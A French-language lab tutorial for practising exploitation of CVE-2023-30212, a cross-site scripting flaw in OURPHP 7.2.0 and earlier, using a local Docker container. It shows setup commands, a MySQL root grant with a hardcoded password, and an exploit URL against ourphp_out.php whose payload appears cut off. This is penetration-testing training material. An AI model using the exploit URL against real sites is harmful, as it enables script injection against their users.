
Environnement de laboratoire pratique pour exploiter CVE-2023-30212, une vulnérabilité XSS stocké dans OURPHP ≤7.2.0, utilisant des conteneurs Docker pour une pratique de test d'intrusion sûre.
CVE-2023-30212 est une vulnérabilité de sécurité qui affecte les versions d'OURPHP antérieures ou égales à 7.2.0. Cette vulnérabilité permet des attaques de Cross-Site Scripting (XSS)
OURPHP <= 7.2.0 est vulnérable au Cross-Site Scripting (XSS) via /client/manage/ourphp_out.php
Étapes
Téléchargeons le Dockerfile
Ouvrez le Terminal dans le dossier où vous avez téléchargé le dockerfile
Installez Docker sur votre machine
kali@kali:~$sudo apt install -y docker.io
Créez une nouvelle image Docker
kali@kali:~$docker build -t test
Créez un nouveau conteneur Docker
kali@kali:~$ docker run -d -p 80:80 test
Configuration du web
Obtenez le shell Docker
kali@kali:~$docker ps
Maintenant, obtenez l'ID du conteneur par exemple 0ac7c99ad8e7
kali@kali:~ docker exec -it 0ac7c99ad8e7 /bin/bash
root@0ac7c99ad8e7:/var/www/html#
Maintenant, obtenez le shell Docker
Configurez la base de données
root@0ac7c99ad8e7:/var/www/html# mysql
Ensuite, tapez ces commandes :-
-GRANT ALL PRIVILEGES ON . TO 'root'@'localhost' IDENTIFIED BY 'naseef' WITH GRANT OPTION;
-FLUSH PRIVILEGES;
La commande que vous avez fournie est une instruction MySQL ou MariaDB utilisée pour accorder tous les privilèges à l'utilisateur 'root' sur toutes les bases de données et tables. Décomposons les composants de la commande
Maintenant que le mot de passe est défini, allez sur le site web et saisissez le mot de passe et configurez
Exploitation de la vulnérabilité
URL :- http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=)
Ce site web est vulnérable aux XSS car le script XSS est déclenché lorsque vous saisissez ce paramètre d'URL